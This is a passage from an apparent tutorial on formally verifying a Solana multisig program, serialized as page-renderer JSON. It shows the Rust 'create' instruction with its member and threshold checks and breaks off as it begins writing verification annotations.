multisig",{"type":27,"tag":1232,"props":30044,"children":30045},{},[30046],{"type":33,"value":30047},"Verify threshold requirements",{"type":27,"tag":1232,"props":30049,"children":30050},{},[30051],{"type":33,"value":30052},"Verify requirements to remove a member",{"type":27,"tag":1232,"props":30054,"children":30055},{},[30056],{"type":33,"value":30057},"Safety guarantees",{"type":27,"tag":58,"props":30059,"children":30061},{"id":30060},"_1-incrementally-verifying-minimum-requirements-to-create-a-multisig",[30062],{"type":33,"value":30063},"1. Incrementally verifying minimum requirements to create a multisig",{"type":27,"tag":36,"props":30065,"children":30066},{},[30067,30069,30074],{"type":33,"value":30068},"Suppose we want to verify the minimum requirements to create a multisig, i.e. the ",{"type":27,"tag":84,"props":30070,"children":30072},{"className":30071},[],[30073],{"type":33,"value":27426},{"type":33,"value":30075}," expression.",{"type":27,"tag":36,"props":30077,"children":30078},{},[30079,30081,30086,30088,30094],{"type":33,"value":30080},"Creating a multisig (",{"type":27,"tag":84,"props":30082,"children":30084},{"className":30083},[],[30085],{"type":33,"value":30014},{"type":33,"value":30087},") requires invoking the ",{"type":27,"tag":84,"props":30089,"children":30091},{"className":30090},[],[30092],{"type":33,"value":30093},"create",{"type":33,"value":30095}," instruction:",{"type":27,"tag":101,"props":30097,"children":30099},{"code":30098,"language":10269,"meta":7,"className":10270,"style":7},"#[derive(Accounts)]\n#[instruction(threshold: u16, create_key: Pubkey, members: Vec\u003CPubkey>)]\npub struct Create\u003C'info> {\n #[account(\n init,\n payer = creator,\n space = Ms::SIZE_WITHOUT_MEMBERS + (members.len() * 32),\n seeds = [b\"squad\", create_key.as_ref(), b\"multisig\"], bump\n )]\n pub multisig: Account\u003C'info, Ms>,\n\n #[account(mut)]\n pub creator: Signer\u003C'info>,\n pub system_program: Program\u003C'info, System>,\n}\n\npub fn create(\n ctx: Context\u003CCreate>,\n threshold: u16,\n create_key: Pubkey,\n members: Vec\u003CPubkey>,\n) -> Result\u003C()> {\n // sort the members and remove duplicates\n let mut members = members;\n members.sort();\n members.dedup();\n\n // check we don't exceed u16\n let total_members = members.len();\n if total_members \u003C 1 {\n return err!(MsError::EmptyMembers);\n }\n\n // make sure we don't exceed u16 on first call\n if total_members > usize::from(u16::MAX) {\n return err!(MsError::MaxMembersReached);\n }\n\n // make sure threshold is valid\n if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n return err!(MsError::InvalidThreshold);\n }\n\n ctx.accounts.multisig.init(\n threshold,\n create_key,\n members,\n *ctx.bumps.get(\"multisig\").unwrap(),\n )\n}\n",[30100],{"type":27,"tag":84,"props":30101,"children":30102},{"__ignoreMap":7},[30103,30120,30175,30205,30213,30221,30238,30289,30339,30347,30388,30395,30411,30444,30486,30493,30500,30519,30547,30567,30587,30615,30634,30642,30670,30690,30710,30717,30725,30757,30780,30814,30821,30828,30836,30877,30909,30916,30923,30931,31006,31038,31045,31052,31088,31100,31112,31124,31177,31185],{"type":27,"tag":207,"props":30104,"children":30105},{"class":209,"line":210},[30106,30111,30116],{"type":27,"tag":207,"props":30107,"children":30108},{"style":238},[30109],{"type":33,"value":30110},"#[derive(",{"type":27,"tag":207,"props":30112,"children":30113},{"style":8920},[30114],{"type":33,"value":30115},"Accounts",{"type":27,"tag":207,"props":30117,"children":30118},{"style":238},[30119],{"type":33,"value":27530},{"type":27,"tag":207,"props":30121,"children":30122},{"class":209,"line":244},[30123,30128,30132,30136,30141,30145,30149,30154,30158,30162,30166,30170],{"type":27,"tag":207,"props":30124,"children":30125},{"style":238},[30126],{"type":33,"value":30127},"#[instruction(threshold",{"type":27,"tag":207,"props":30129,"children":30130},{"style":226},[30131],{"type":33,"value":736},{"type":27,"tag":207,"props":30133,"children":30134},{"style":8920},[30135],{"type":33,"value":28302},{"type":27,"tag":207,"props":30137,"children":30138},{"style":238},[30139],{"type":33,"value":30140},", create_key",{"type":27,"tag":207,"props":30142,"children":30143},{"style":226},[30144],{"type":33,"value":736},{"type":27,"tag":207,"props":30146,"children":30147},{"style":8920},[30148],{"type":33,"value":28129},{"type":27,"tag":207,"props":30150,"children":30151},{"style":238},[30152],{"type":33,"value":30153},", members",{"type":27,"tag":207,"props":30155,"children":30156},{"style":226},[30157],{"type":33,"value":736},{"type":27,"tag":207,"props":30159,"children":30160},{"style":8920},[30161],{"type":33,"value":28661},{"type":27,"tag":207,"props":30163,"children":30164},{"style":238},[30165],{"type":33,"value":9257},{"type":27,"tag":207,"props":30167,"children":30168},{"style":8920},[30169],{"type":33,"value":28670},{"type":27,"tag":207,"props":30171,"children":30172},{"style":238},[30173],{"type":33,"value":30174},">)]\n",{"type":27,"tag":207,"props":30176,"children":30177},{"class":209,"line":270},[30178,30182,30186,30191,30196,30201],{"type":27,"tag":207,"props":30179,"children":30180},{"style":214},[30181],{"type":33,"value":20967},{"type":27,"tag":207,"props":30183,"children":30184},{"style":214},[30185],{"type":33,"value":28423},{"type":27,"tag":207,"props":30187,"children":30188},{"style":8920},[30189],{"type":33,"value":30190}," Create",{"type":27,"tag":207,"props":30192,"children":30193},{"style":238},[30194],{"type":33,"value":30195},"\u003C'",{"type":27,"tag":207,"props":30197,"children":30198},{"style":8920},[30199],{"type":33,"value":30200},"info",{"type":27,"tag":207,"props":30202,"children":30203},{"style":238},[30204],{"type":33,"value":14563},{"type":27,"tag":207,"props":30206,"children":30207},{"class":209,"line":296},[30208],{"type":27,"tag":207,"props":30209,"children":30210},{"style":238},[30211],{"type":33,"value":30212}," #[account(\n",{"type":27,"tag":207,"props":30214,"children":30215},{"class":209,"line":445},[30216],{"type":27,"tag":207,"props":30217,"children":30218},{"style":238},[30219],{"type":33,"value":30220}," init,\n",{"type":27,"tag":207,"props":30222,"children":30223},{"class":209,"line":867},[30224,30229,30233],{"type":27,"tag":207,"props":30225,"children":30226},{"style":238},[30227],{"type":33,"value":30228}," payer ",{"type":27,"tag":207,"props":30230,"children":30231},{"style":226},[30232],{"type":33,"value":10380},{"type":27,"tag":207,"props":30234,"children":30235},{"style":238},[30236],{"type":33,"value":30237}," creator,\n",{"type":27,"tag":207,"props":30239,"children":30240},{"class":209,"line":892},[30241,30246,30250,30254,30258,30263,30267,30272,30276,30280,30284],{"type":27,"tag":207,"props":30242,"children":30243},{"style":238},[30244],{"type":33,"value":30245}," space ",{"type":27,"tag":207,"props":30247,"children":30248},{"style":226},[30249],{"type":33,"value":10380},{"type":27,"tag":207,"props":30251,"children":30252},{"style":8920},[30253],{"type":33,"value":28428},{"type":27,"tag":207,"props":30255,"children":30256},{"style":226},[30257],{"type":33,"value":10768},{"type":27,"tag":207,"props":30259,"children":30260},{"style":8920},[30261],{"type":33,"value":30262},"SIZE_WITHOUT_MEMBERS",{"type":27,"tag":207,"props":30264,"children":30265},{"style":226},[30266],{"type":33,"value":1374},{"type":27,"tag":207,"props":30268,"children":30269},{"style":238},[30270],{"type":33,"value":30271}," (members",{"type":27,"tag":207,"props":30273,"children":30274},{"style":226},[30275],{"type":33,"value":1041},{"type":27,"tag":207,"props":30277,"children":30278},{"style":238},[30279],{"type":33,"value":28293},{"type":27,"tag":207,"props":30281,"children":30282},{"style":226},[30283],{"type":33,"value":9286},{"type":27,"tag":207,"props":30285,"children":30286},{"style":238},[30287],{"type":33,"value":30288}," 32),\n",{"type":27,"tag":207,"props":30290,"children":30291},{"class":209,"line":1475},[30292,30297,30301,30306,30311,30315,30319,30324,30329,30334],{"type":27,"tag":207,"props":30293,"children":30294},{"style":238},[30295],{"type":33,"value":30296}," seeds ",{"type":27,"tag":207,"props":30298,"children":30299},{"style":226},[30300],{"type":33,"value":10380},{"type":27,"tag":207,"props":30302,"children":30303},{"style":238},[30304],{"type":33,"value":30305}," [",{"type":27,"tag":207,"props":30307,"children":30308},{"style":1325},[30309],{"type":33,"value":30310},"b\"squad\"",{"type":27,"tag":207,"props":30312,"children":30313},{"style":238},[30314],{"type":33,"value":30140},{"type":27,"tag":207,"props":30316,"children":30317},{"style":226},[30318],{"type":33,"value":1041},{"type":27,"tag":207,"props":30320,"children":30321},{"style":238},[30322],{"type":33,"value":30323},"as_ref(), ",{"type":27,"tag":207,"props":30325,"children":30326},{"style":1325},[30327],{"type":33,"value":30328},"b\"multisig\"",{"type":27,"tag":207,"props":30330,"children":30331},{"style":238},[30332],{"type":33,"value":30333},"], ",{"type":27,"tag":207,"props":30335,"children":30336},{"style":220},[30337],{"type":33,"value":30338},"bump\n",{"type":27,"tag":207,"props":30340,"children":30341},{"class":209,"line":2065},[30342],{"type":27,"tag":207,"props":30343,"children":30344},{"style":238},[30345],{"type":33,"value":30346}," )]\n",{"type":27,"tag":207,"props":30348,"children":30349},{"class":209,"line":2092},[30350,30354,30359,30363,30368,30372,30376,30380,30384],{"type":27,"tag":207,"props":30351,"children":30352},{"style":214},[30353],{"type":33,"value":28115},{"type":27,"tag":207,"props":30355,"children":30356},{"style":220},[30357],{"type":33,"value":30358}," multisig",{"type":27,"tag":207,"props":30360,"children":30361},{"style":226},[30362],{"type":33,"value":736},{"type":27,"tag":207,"props":30364,"children":30365},{"style":8920},[30366],{"type":33,"value":30367}," Account",{"type":27,"tag":207,"props":30369,"children":30370},{"style":238},[30371],{"type":33,"value":30195},{"type":27,"tag":207,"props":30373,"children":30374},{"style":8920},[30375],{"type":33,"value":30200},{"type":27,"tag":207,"props":30377,"children":30378},{"style":238},[30379],{"type":33,"value":1123},{"type":27,"tag":207,"props":30381,"children":30382},{"style":8920},[30383],{"type":33,"value":30014},{"type":27,"tag":207,"props":30385,"children":30386},{"style":238},[30387],{"type":33,"value":13420},{"type":27,"tag":207,"props":30389,"children":30390},{"class":209,"line":2130},[30391],{"type":27,"tag":207,"props":30392,"children":30393},{"emptyLinePlaceholder":19},[30394],{"type":33,"value":2062},{"type":27,"tag":207,"props":30396,"children":30397},{"class":209,"line":2168},[30398,30403,30407],{"type":27,"tag":207,"props":30399,"children":30400},{"style":238},[30401],{"type":33,"value":30402}," #[account(",{"type":27,"tag":207,"props":30404,"children":30405},{"style":214},[30406],{"type":33,"value":11009},{"type":27,"tag":207,"props":30408,"children":30409},{"style":238},[30410],{"type":33,"value":27530},{"type":27,"tag":207,"props":30412,"children":30413},{"class":209,"line":4095},[30414,30418,30423,30427,30432,30436,30440],{"type":27,"tag":207,"props":30415,"children":30416},{"style":214},[30417],{"type":33,"value":28115},{"type":27,"tag":207,"props":30419,"children":30420},{"style":220},[30421],{"type":33,"value":30422}," creator",{"type":27,"tag":207,"props":30424,"children":30425},{"style":226},[30426],{"type":33,"value":736},{"type":27,"tag":207,"props":30428,"children":30429},{"style":8920},[30430],{"type":33,"value":30431}," Signer",{"type":27,"tag":207,"props":30433,"children":30434},{"style":238},[30435],{"type":33,"value":30195},{"type":27,"tag":207,"props":30437,"children":30438},{"style":8920},[30439],{"type":33,"value":30200},{"type":27,"tag":207,"props":30441,"children":30442},{"style":238},[30443],{"type":33,"value":13420},{"type":27,"tag":207,"props":30445,"children":30446},{"class":209,"line":4103},[30447,30451,30456,30460,30465,30469,30473,30477,30482],{"type":27,"tag":207,"props":30448,"children":30449},{"style":214},[30450],{"type":33,"value":28115},{"type":27,"tag":207,"props":30452,"children":30453},{"style":220},[30454],{"type":33,"value":30455}," system_program",{"type":27,"tag":207,"props":30457,"children":30458},{"style":226},[30459],{"type":33,"value":736},{"type":27,"tag":207,"props":30461,"children":30462},{"style":8920},[30463],{"type":33,"value":30464}," Program",{"type":27,"tag":207,"props":30466,"children":30467},{"style":238},[30468],{"type":33,"value":30195},{"type":27,"tag":207,"props":30470,"children":30471},{"style":8920},[30472],{"type":33,"value":30200},{"type":27,"tag":207,"props":30474,"children":30475},{"style":238},[30476],{"type":33,"value":1123},{"type":27,"tag":207,"props":30478,"children":30479},{"style":8920},[30480],{"type":33,"value":30481},"System",{"type":27,"tag":207,"props":30483,"children":30484},{"style":238},[30485],{"type":33,"value":13420},{"type":27,"tag":207,"props":30487,"children":30488},{"class":209,"line":4154},[30489],{"type":27,"tag":207,"props":30490,"children":30491},{"style":238},[30492],{"type":33,"value":451},{"type":27,"tag":207,"props":30494,"children":30495},{"class":209,"line":4203},[30496],{"type":27,"tag":207,"props":30497,"children":30498},{"emptyLinePlaceholder":19},[30499],{"type":33,"value":2062},{"type":27,"tag":207,"props":30501,"children":30502},{"class":209,"line":4249},[30503,30507,30511,30515],{"type":27,"tag":207,"props":30504,"children":30505},{"style":214},[30506],{"type":33,"value":20967},{"type":27,"tag":207,"props":30508,"children":30509},{"style":214},[30510],{"type":33,"value":20972},{"type":27,"tag":207,"props":30512,"children":30513},{"style":1335},[30514],{"type":33,"value":14394},{"type":27,"tag":207,"props":30516,"children":30517},{"style":238},[30518],{"type":33,"value":9090},{"type":27,"tag":207,"props":30520,"children":30521},{"class":209,"line":4290},[30522,30526,30530,30534,30538,30543],{"type":27,"tag":207,"props":30523,"children":30524},{"style":220},[30525],{"type":33,"value":27495},{"type":27,"tag":207,"props":30527,"children":30528},{"style":226},[30529],{"type":33,"value":736},{"type":27,"tag":207,"props":30531,"children":30532},{"style":8920},[30533],{"type":33,"value":27561},{"type":27,"tag":207,"props":30535,"children":30536},{"style":238},[30537],{"type":33,"value":9257},{"type":27,"tag":207,"props":30539,"children":30540},{"style":8920},[30541],{"type":33,"value":30542},"Create",{"type":27,"tag":207,"props":30544,"children":30545},{"style":238},[30546],{"type":33,"value":13420},{"type":27,"tag":207,"props":30548,"children":30549},{"class":209,"line":4304},[30550,30555,30559,30563],{"type":27,"tag":207,"props":30551,"children":30552},{"style":220},[30553],{"type":33,"value":30554}," threshold",{"type":27,"tag":207,"props":30556,"children":30557},{"style":226},[30558],{"type":33,"value":736},{"type":27,"tag":207,"props":30560,"children":30561},{"style":8920},[30562],{"type":33,"value":28302},{"type":27,"tag":207,"props":30564,"children":30565},{"style":238},[30566],{"type":33,"value":1842},{"type":27,"tag":207,"props":30568,"children":30569},{"class":209,"line":5466},[30570,30575,30579,30583],{"type":27,"tag":207,"props":30571,"children":30572},{"style":220},[30573],{"type":33,"value":30574}," create_key",{"type":27,"tag":207,"props":30576,"children":30577},{"style":226},[30578],{"type":33,"value":736},{"type":27,"tag":207,"props":30580,"children":30581},{"style":8920},[30582],{"type":33,"value":28129},{"type":27,"tag":207,"props":30584,"children":30585},{"style":238},[30586],{"type":33,"value":1842},{"type":27,"tag":207,"props":30588,"children":30589},{"class":209,"line":5530},[30590,30595,30599,30603,30607,30611],{"type":27,"tag":207,"props":30591,"children":30592},{"style":220},[30593],{"type":33,"value":30594}," members",{"type":27,"tag":207,"props":30596,"children":30597},{"style":226},[30598],{"type":33,"value":736},{"type":27,"tag":207,"props":30600,"children":30601},{"style":8920},[30602],{"type":33,"value":28661},{"type":27,"tag":207,"props":30604,"children":30605},{"style":238},[30606],{"type":33,"value":9257},{"type":27,"tag":207,"props":30608,"children":30609},{"style":8920},[30610],{"type":33,"value":28670},{"type":27,"tag":207,"props":30612,"children":30613},{"style":238},[30614],{"type":33,"value":13420},{"type":27,"tag":207,"props":30616,"children":30617},{"class":209,"line":7900},[30618,30622,30626,30630],{"type":27,"tag":207,"props":30619,"children":30620},{"style":238},[30621],{"type":33,"value":2222},{"type":27,"tag":207,"props":30623,"children":30624},{"style":226},[30625],{"type":33,"value":8968},{"type":27,"tag":207,"props":30627,"children":30628},{"style":8920},[30629],{"type":33,"value":21038},{"type":27,"tag":207,"props":30631,"children":30632},{"style":238},[30633],{"type":33,"value":27603},{"type":27,"tag":207,"props":30635,"children":30636},{"class":209,"line":7909},[30637],{"type":27,"tag":207,"props":30638,"children":30639},{"style":4647},[30640],{"type":33,"value":30641}," // sort the members and remove duplicates\n",{"type":27,"tag":207,"props":30643,"children":30644},{"class":209,"line":7917},[30645,30649,30653,30658,30662,30666],{"type":27,"tag":207,"props":30646,"children":30647},{"style":214},[30648],{"type":33,"value":10290},{"type":27,"tag":207,"props":30650,"children":30651},{"style":214},[30652],{"type":33,"value":10295},{"type":27,"tag":207,"props":30654,"children":30655},{"style":220},[30656],{"type":33,"value":30657}," members",{"type":27,"tag":207,"props":30659,"children":30660},{"style":226},[30661],{"type":33,"value":229},{"type":27,"tag":207,"props":30663,"children":30664},{"style":220},[30665],{"type":33,"value":30657},{"type":27,"tag":207,"props":30667,"children":30668},{"style":238},[30669],{"type":33,"value":241},{"type":27,"tag":207,"props":30671,"children":30672},{"class":209,"line":7926},[30673,30677,30681,30686],{"type":27,"tag":207,"props":30674,"children":30675},{"style":220},[30676],{"type":33,"value":30594},{"type":27,"tag":207,"props":30678,"children":30679},{"style":226},[30680],{"type":33,"value":1041},{"type":27,"tag":207,"props":30682,"children":30683},{"style":1335},[30684],{"type":33,"value":30685},"sort",{"type":27,"tag":207,"props":30687,"children":30688},{"style":238},[30689],{"type":33,"value":4301},{"type":27,"tag":207,"props":30691,"children":30692},{"class":209,"line":7934},[30693,30697,30701,30706],{"type":27,"tag":207,"props":30694,"children":30695},{"style":220},[30696],{"type":33,"value":30594},{"type":27,"tag":207,"props":30698,"children":30699},{"style":226},[30700],{"type":33,"value":1041},{"type":27,"tag":207,"props":30702,"children":30703},{"style":1335},[30704],{"type":33,"value":30705},"dedup",{"type":27,"tag":207,"props":30707,"children":30708},{"style":238},[30709],{"type":33,"value":4301},{"type":27,"tag":207,"props":30711,"children":30712},{"class":209,"line":7943},[30713],{"type":27,"tag":207,"props":30714,"children":30715},{"emptyLinePlaceholder":19},[30716],{"type":33,"value":2062},{"type":27,"tag":207,"props":30718,"children":30719},{"class":209,"line":7952},[30720],{"type":27,"tag":207,"props":30721,"children":30722},{"style":4647},[30723],{"type":33,"value":30724}," // check we don't exceed u16\n",{"type":27,"tag":207,"props":30726,"children":30727},{"class":209,"line":7961},[30728,30732,30737,30741,30745,30749,30753],{"type":27,"tag":207,"props":30729,"children":30730},{"style":214},[30731],{"type":33,"value":10290},{"type":27,"tag":207,"props":30733,"children":30734},{"style":220},[30735],{"type":33,"value":30736}," total_members",{"type":27,"tag":207,"props":30738,"children":30739},{"style":226},[30740],{"type":33,"value":229},{"type":27,"tag":207,"props":30742,"children":30743},{"style":220},[30744],{"type":33,"value":30657},{"type":27,"tag":207,"props":30746,"children":30747},{"style":226},[30748],{"type":33,"value":1041},{"type":27,"tag":207,"props":30750,"children":30751},{"style":1335},[30752],{"type":33,"value":16416},{"type":27,"tag":207,"props":30754,"children":30755},{"style":238},[30756],{"type":33,"value":4301},{"type":27,"tag":207,"props":30758,"children":30759},{"class":209,"line":7969},[30760,30764,30768,30772,30776],{"type":27,"tag":207,"props":30761,"children":30762},{"style":376},[30763],{"type":33,"value":19556},{"type":27,"tag":207,"props":30765,"children":30766},{"style":220},[30767],{"type":33,"value":30736},{"type":27,"tag":207,"props":30769,"children":30770},{"style":226},[30771],{"type":33,"value":4695},{"type":27,"tag":207,"props":30773,"children":30774},{"style":232},[30775],{"type":33,"value":235},{"type":27,"tag":207,"props":30777,"children":30778},{"style":238},[30779],{"type":33,"value":384},{"type":27,"tag":207,"props":30781,"children":30782},{"class":209,"line":7978},[30783,30787,30792,30796,30801,30805,30810],{"type":27,"tag":207,"props":30784,"children":30785},{"style":376},[30786],{"type":33,"value":23019},{"type":27,"tag":207,"props":30788,"children":30789},{"style":1335},[30790],{"type":33,"value":30791}," err!",{"type":27,"tag":207,"props":30793,"children":30794},{"style":238},[30795],{"type":33,"value":1343},{"type":27,"tag":207,"props":30797,"children":30798},{"style":8920},[30799],{"type":33,"value":30800},"MsError",{"type":27,"tag":207,"props":30802,"children":30803},{"style":226},[30804],{"type":33,"value":10768},{"type":27,"tag":207,"props":30806,"children":30807},{"style":8920},[30808],{"type":33,"value":30809},"EmptyMembers",{"type":27,"tag":207,"props":30811,"children":30812},{"style":238},[30813],{"type":33,"value":1455},{"type":27,"tag":207,"props":30815,"children":30816},{"class":209,"line":7987},[30817],{"type":27,"tag":207,"props":30818,"children":30819},{"style":238},[30820],{"type":33,"value":10645},{"type":27,"tag":207,"props":30822,"children":30823},{"class":209,"line":7996},[30824],{"type":27,"tag":207,"props":30825,"children":30826},{"emptyLinePlaceholder":19},[30827],{"type":33,"value":2062},{"type":27,"tag":207,"props":30829,"children":30830},{"class":209,"line":8005},[30831],{"type":27,"tag":207,"props":30832,"children":30833},{"style":4647},[30834],{"type":33,"value":30835}," // make sure we don't exceed u16 on first call\n",{"type":27,"tag":207,"props":30837,"children":30838},{"class":209,"line":8013},[30839,30843,30847,30851,30855,30859,30863,30868,30872],{"type":27,"tag":207,"props":30840,"children":30841},{"style":376},[30842],{"type":33,"value":19556},{"type":27,"tag":207,"props":30844,"children":30845},{"style":220},[30846],{"type":33,"value":30736},{"type":27,"tag":207,"props":30848,"children":30849},{"style":226},[30850],{"type":33,"value":21470},{"type":27,"tag":207,"props":30852,"children":30853},{"style":8920},[30854],{"type":33,"value":21008},{"type":27,"tag":207,"props":30856,"children":30857},{"style":226},[30858],{"type":33,"value":10768},{"type":27,"tag":207,"props":30860,"children":30861},{"style":1335},[30862],{"type":33,"value":26744},{"type":27,"tag":207,"props":30864,"children":30865},{"style":238},[30866],{"type":33,"value":30867},"(u16",{"type":27,"tag":207,"props":30869,"children":30870},{"style":226},[30871],{"type":33,"value":10768},{"type":27,"tag":207,"props":30873,"children":30874},{"style":238},[30875],{"type":33,"value":30876},"MAX) {\n",{"type":27,"tag":207,"props":30878,"children":30879},{"class":209,"line":8021},[30880,30884,30888,30892,30896,30900,30905],{"type":27,"tag":207,"props":30881,"children":30882},{"style":376},[30883],{"type":33,"value":23019},{"type":27,"tag":207,"props":30885,"children":30886},{"style":1335},[30887],{"type":33,"value":30791},{"type":27,"tag":207,"props":30889,"children":30890},{"style":238},[30891],{"type":33,"value":1343},{"type":27,"tag":207,"props":30893,"children":30894},{"style":8920},[30895],{"type":33,"value":30800},{"type":27,"tag":207,"props":30897,"children":30898},{"style":226},[30899],{"type":33,"value":10768},{"type":27,"tag":207,"props":30901,"children":30902},{"style":8920},[30903],{"type":33,"value":30904},"MaxMembersReached",{"type":27,"tag":207,"props":30906,"children":30907},{"style":238},[30908],{"type":33,"value":1455},{"type":27,"tag":207,"props":30910,"children":30911},{"class":209,"line":8029},[30912],{"type":27,"tag":207,"props":30913,"children":30914},{"style":238},[30915],{"type":33,"value":10645},{"type":27,"tag":207,"props":30917,"children":30918},{"class":209,"line":8037},[30919],{"type":27,"tag":207,"props":30920,"children":30921},{"emptyLinePlaceholder":19},[30922],{"type":33,"value":2062},{"type":27,"tag":207,"props":30924,"children":30925},{"class":209,"line":8046},[30926],{"type":27,"tag":207,"props":30927,"children":30928},{"style":4647},[30929],{"type":33,"value":30930}," // make sure threshold is valid\n",{"type":27,"tag":207,"props":30932,"children":30933},{"class":209,"line":8055},[30934,30938,30942,30946,30950,30954,30958,30963,30967,30972,30976,30980,30984,30988,30992,30997,31002],{"type":27,"tag":207,"props":30935,"children":30936},{"style":376},[30937],{"type":33,"value":19556},{"type":27,"tag":207,"props":30939,"children":30940},{"style":8920},[30941],{"type":33,"value":21008},{"type":27,"tag":207,"props":30943,"children":30944},{"style":226},[30945],{"type":33,"value":10768},{"type":27,"tag":207,"props":30947,"children":30948},{"style":1335},[30949],{"type":33,"value":26744},{"type":27,"tag":207,"props":30951,"children":30952},{"style":238},[30953],{"type":33,"value":1343},{"type":27,"tag":207,"props":30955,"children":30956},{"style":220},[30957],{"type":33,"value":30022},{"type":27,"tag":207,"props":30959,"children":30960},{"style":238},[30961],{"type":33,"value":30962},") \u003C ",{"type":27,"tag":207,"props":30964,"children":30965},{"style":232},[30966],{"type":33,"value":1651},{"type":27,"tag":207,"props":30968,"children":30969},{"style":226},[30970],{"type":33,"value":30971}," ||",{"type":27,"tag":207,"props":30973,"children":30974},{"style":8920},[30975],{"type":33,"value":21008},{"type":27,"tag":207,"props":30977,"children":30978},{"style":226},[30979],{"type":33,"value":10768},{"type":27,"tag":207,"props":30981,"children":30982},{"style":1335},[30983],{"type":33,"value":26744},{"type":27,"tag":207,"props":30985,"children":30986},{"style":238},[30987],{"type":33,"value":1343},{"type":27,"tag":207,"props":30989,"children":30990},{"style":220},[30991],{"type":33,"value":30022},{"type":27,"tag":207,"props":30993,"children":30994},{"style":238},[30995],{"type":33,"value":30996},") > ",{"type":27,"tag":207,"props":30998,"children":30999},{"style":220},[31000],{"type":33,"value":31001},"total_members",{"type":27,"tag":207,"props":31003,"children":31004},{"style":238},[31005],{"type":33,"value":384},{"type":27,"tag":207,"props":31007,"children":31008},{"class":209,"line":8064},[31009,31013,31017,31021,31025,31029,31034],{"type":27,"tag":207,"props":31010,"children":31011},{"style":376},[31012],{"type":33,"value":23019},{"type":27,"tag":207,"props":31014,"children":31015},{"style":1335},[31016],{"type":33,"value":30791},{"type":27,"tag":207,"props":31018,"children":31019},{"style":238},[31020],{"type":33,"value":1343},{"type":27,"tag":207,"props":31022,"children":31023},{"style":8920},[31024],{"type":33,"value":30800},{"type":27,"tag":207,"props":31026,"children":31027},{"style":226},[31028],{"type":33,"value":10768},{"type":27,"tag":207,"props":31030,"children":31031},{"style":8920},[31032],{"type":33,"value":31033},"InvalidThreshold",{"type":27,"tag":207,"props":31035,"children":31036},{"style":238},[31037],{"type":33,"value":1455},{"type":27,"tag":207,"props":31039,"children":31040},{"class":209,"line":8072},[31041],{"type":27,"tag":207,"props":31042,"children":31043},{"style":238},[31044],{"type":33,"value":10645},{"type":27,"tag":207,"props":31046,"children":31047},{"class":209,"line":8081},[31048],{"type":27,"tag":207,"props":31049,"children":31050},{"emptyLinePlaceholder":19},[31051],{"type":33,"value":2062},{"type":27,"tag":207,"props":31053,"children":31054},{"class":209,"line":8090},[31055,31059,31063,31067,31071,31076,31080,31084],{"type":27,"tag":207,"props":31056,"children":31057},{"style":220},[31058],{"type":33,"value":27495},{"type":27,"tag":207,"props":31060,"children":31061},{"style":226},[31062],{"type":33,"value":1041},{"type":27,"tag":207,"props":31064,"children":31065},{"style":238},[31066],{"type":33,"value":21951},{"type":27,"tag":207,"props":31068,"children":31069},{"style":226},[31070],{"type":33,"value":1041},{"type":27,"tag":207,"props":31072,"children":31073},{"style":238},[31074],{"type":33,"value":31075},"multisig",{"type":27,"tag":207,"props":31077,"children":31078},{"style":226},[31079],{"type":33,"value":1041},{"type":27,"tag":207,"props":31081,"children":31082},{"style":1335},[31083],{"type":33,"value":28012},{"type":27,"tag":207,"props":31085,"children":31086},{"style":238},[31087],{"type":33,"value":9090},{"type":27,"tag":207,"props":31089,"children":31090},{"class":209,"line":8098},[31091,31096],{"type":27,"tag":207,"props":31092,"children":31093},{"style":220},[31094],{"type":33,"value":31095}," threshold",{"type":27,"tag":207,"props":31097,"children":31098},{"style":238},[31099],{"type":33,"value":1842},{"type":27,"tag":207,"props":31101,"children":31102},{"class":209,"line":8107},[31103,31108],{"type":27,"tag":207,"props":31104,"children":31105},{"style":220},[31106],{"type":33,"value":31107}," create_key",{"type":27,"tag":207,"props":31109,"children":31110},{"style":238},[31111],{"type":33,"value":1842},{"type":27,"tag":207,"props":31113,"children":31114},{"class":209,"line":8116},[31115,31120],{"type":27,"tag":207,"props":31116,"children":31117},{"style":220},[31118],{"type":33,"value":31119}," members",{"type":27,"tag":207,"props":31121,"children":31122},{"style":238},[31123],{"type":33,"value":1842},{"type":27,"tag":207,"props":31125,"children":31126},{"class":209,"line":8125},[31127,31131,31135,31139,31144,31148,31152,31156,31161,31165,31169,31173],{"type":27,"tag":207,"props":31128,"children":31129},{"style":226},[31130],{"type":33,"value":15034},{"type":27,"tag":207,"props":31132,"children":31133},{"style":220},[31134],{"type":33,"value":27552},{"type":27,"tag":207,"props":31136,"children":31137},{"style":226},[31138],{"type":33,"value":1041},{"type":27,"tag":207,"props":31140,"children":31141},{"style":238},[31142],{"type":33,"value":31143},"bumps",{"type":27,"tag":207,"props":31145,"children":31146},{"style":226},[31147],{"type":33,"value":1041},{"type":27,"tag":207,"props":31149,"children":31150},{"style":1335},[31151],{"type":33,"value":23627},{"type":27,"tag":207,"props":31153,"children":31154},{"style":238},[31155],{"type":33,"value":1343},{"type":27,"tag":207,"props":31157,"children":31158},{"style":1325},[31159],{"type":33,"value":31160},"\"multisig\"",{"type":27,"tag":207,"props":31162,"children":31163},{"style":238},[31164],{"type":33,"value":10416},{"type":27,"tag":207,"props":31166,"children":31167},{"style":226},[31168],{"type":33,"value":1041},{"type":27,"tag":207,"props":31170,"children":31171},{"style":1335},[31172],{"type":33,"value":10952},{"type":27,"tag":207,"props":31174,"children":31175},{"style":238},[31176],{"type":33,"value":10778},{"type":27,"tag":207,"props":31178,"children":31179},{"class":209,"line":8133},[31180],{"type":27,"tag":207,"props":31181,"children":31182},{"style":238},[31183],{"type":33,"value":31184}," )\n",{"type":27,"tag":207,"props":31186,"children":31187},{"class":209,"line":8142},[31188],{"type":27,"tag":207,"props":31189,"children":31190},{"style":238},[31191],{"type":33,"value":451},{"type":27,"tag":36,"props":31193,"children":31194},{},[31195,31197,31202,31204,31209],{"type":33,"value":31196},"We can start by testing an empty ",{"type":27,"tag":84,"props":31198,"children":31200},{"className":31199},[],[31201],{"type":33,"value":27426},{"type":33,"value":31203}," (this will default to ",{"type":27,"tag":84,"props":31205,"children":31207},{"className":31206},[],[31208],{"type":33,"value":11278},{"type":33,"value":31210},"):",{"type":27,"tag":101,"props":31212,"children":31214},{"code":31213,"language":10269,"meta":7,"className":10270,"style":7},"#[succeeds_if()]\npub fn create(...) { ... 